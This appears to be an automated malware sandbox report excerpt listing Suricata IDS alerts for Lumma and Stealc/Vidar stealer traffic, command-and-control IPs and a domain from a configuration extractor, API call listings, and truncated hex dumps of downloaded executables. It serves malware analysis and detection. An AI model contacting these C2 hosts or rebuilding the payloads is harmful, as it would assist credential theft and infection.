                      Source: Network trafficSuricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.10:50238 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50337 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50337 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.10:50267 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50337 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50296 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50296 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.10:50302 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022985 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no accept headers : 192.168.2.10:50302 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2022986 - Severity 1 - ET MALWARE Generic Request to gate.php Dotted-Quad : 192.168.2.10:50302 -> 185.81.68.147:80
                      Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.10:50079 -> 116.203.10.31:443
                      Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.10.31:443 -> 192.168.2.10:50079
                      Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.10.31:443 -> 192.168.2.10:50088
                      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:50259 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:50259 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:50267 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:50238 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:50238 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.10:50299 -> 172.67.213.48:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:50308 -> 172.67.213.48:443
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.81.68.147 80
                      Source: C:\Windows\explorer.exeDomain query: support.mozilla.org
                      Source: Malware configuration extractorIPs: 185.215.113.43
                      Source: Malware configuration extractorURLs: 185.81.68.147:1912
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F33CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, IPInfoFetcher9_2_00007FF643F33CE0
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F33CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, https://ipinfo.io/json9_2_00007FF643F33CE0
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF684573CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, IPInfoFetcher11_2_00007FF684573CE0
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF684573CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, https://ipinfo.io/json11_2_00007FF684573CE0
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD73CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, IPInfoFetcher13_2_00007FF61DD73CE0
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD73CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, https://ipinfo.io/json13_2_00007FF61DD73CE0
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficTCP traffic: 192.168.2.10:49987 -> 185.81.68.147:1912
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:48:11 GMTContent-Type: application/octet-streamContent-Length: 605696Last-Modified: Thu, 12 Dec 2024 15:01:11 GMTConnection: keep-aliveETag: "675afab7-93e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 08 00 b4 00 00 00 00 60 09 00 48 04 00 00 00 10 09 00 74 4c 00 00 00 00 00 00 00 00 00 00 00 70 09 00 90 0b 00 00 80 04 08 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 06 08 00 28 00 00 00 40 03 08 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 07 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3e ec 06 00 00 10 00 00 00 ee 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 ce 01 00 00 00 07 00 00 d0 01 00 00 f2 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 3b 00 00 00 d0 08 00 00 1c 00 00 00 c2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 74 4c 00 00 00 10 09 00 00 4e 00 00 00 de 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 48 04 00 00 00 60 09 00 00 06 00 00 00 2c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 90 0b 00 00 00 70 09 00 00 0c 00 00 00 32 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:48:17 GMTContent-Type: application/octet-streamContent-Length: 605696Last-Modified: Thu, 12 Dec 2024 15:01:25 GMTConnection: keep-aliveETag: "675afac5-93e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 08 00 b4 00 00 00 00 60 09 00 48 04 00 00 00 10 09 00 74 4c 00 00 00 00 00 00 00 00 00 00 00 70 09 00 90 0b 00 00 80 04 08 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 06 08 00 28 00 00 00 40 03 08 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 07 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3e ec 06 00 00 10 00 00 00 ee 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 ce 01 00 00 00 07 00 00 d0 01 00 00 f2 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 3b 00 00 00 d0 08 00 00 1c 00 00 00 c2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 74 4c 00 00 00 10 09 00 00 4e 00 00 00 de 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 48 04 00 00 00 60 09 00 00 06 00 00 00 2c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 90 0b 00 00 00 70 09 00 00 0c 00 00 00 32 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:48:24 GMTContent-Type: application/octet-streamContent-Length: 605696Last-Modified: Thu, 12 Dec 2024 15:01:40 GMTConnection: keep-aliveETag: "675afad4-93e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 08 00 b4 00 00 00 00 60 09 00 48 04 00 00 00 10 09 00 74 4c 00 00 00 00 00 00 00 00 00 00 00 70 09 00 90 0b 00 00 80 04 08 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 06 08 00 28 00 00 00 40 03 08 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 07 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3e ec 06 00 00 10 00 00 00 ee 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 ce 01 00 00 00 07 00 00 d0 01 00 00 f2 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 3b 00 00 00 d0 08 00 00 1c 00 00 00 c2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 74 4c 00 00 00 10 09 00 00 4e 00 00 00 de 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 48 04 00 00 00 60 09 00 00 06 00 00 00 2c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 90 0b 00 00 00 70 09 00 00 0c 00 00 00 32 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:48:30 GMTContent-Type: application/octet-streamContent-Length: 308224Last-Modified: Thu, 12 Dec 2024 15:27:42 GMTConnection: keep-aliveETag: "675b00ee-4b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 5c b7 69 25 3d d9 3a 25 3d d9 3a 25 3d d9 3a 2c 45 4a 3a 26 3d d9 3a 25 3d d8 3a 26 3d d9 3a 4a 4b 72 3a 2d 3d d9 3a 4a 4b 43 3a 24 3d d9 3a 4a 4b 44 3a 24 3d d9 3a 52 69 63 68 25 3d d9 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 60 50 59 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 2a 00 00 00 00 00 00 5c 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 68 00 00 28 00 00 00 00 90 00 00 28 03 00 00 00 80 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb 39 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c8 18 00 00 00 50 00 00 00 1a 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 06 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 40 02 00 00 00 80 00 00 00 04 00 00 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 28 03 00 00 00 90 00 00 00 04 00 00 00 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 36 34 00 00 00 00 00 60 04 00 00 a0 00 00 00 54 04 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:48:36 GMTContent-Type: application/octet-streamContent-Length: 1985024Last-Modified: Thu, 12 Dec 2024 14:33:08 GMTConnection: keep-aliveETag: "675af424-1e4a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f8 9d 40 24 ab 9d 40 24 ab 9d 40 24 ab 83 12 a0 ab 81 40 24 ab 83 12 b1 ab 89 40 24 ab 83 12 a7 ab c5 40 24 ab ba 86 5f ab 94 40 24 ab 9d 40 25 ab f6 40 24 ab 83 12 ae ab 9c 40 24 ab 83 12 b0 ab 9c 40 24 ab 83 12 b5 ab 9c 40 24 ab 52 69 63 68 9d 40 24 ab 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0c de dd 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 b0 01 00 00 00 00 00 00 80 87 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 87 00 00 04 00 00 f5 c2 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5a 10 42 00 6e 00 00 00 00 e0 40 00 68 21 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 b8 86 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 40 00 00 10 00 00 00 54 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 21 01 00 00 e0 40 00 00 94 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 42 00 00 02 00 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 20 42 00 00 02 00 00 00 fa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 68 66 74 6e 77 67 6b 00 30 1b 00 00 40 6c 00 00 28 1b 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6e 6c 6e 6b 74 6d 72 00 10 00 00 00 70 87 00 00 04 00 00 00 24 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 87 00 00 22 00 00 00 28 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
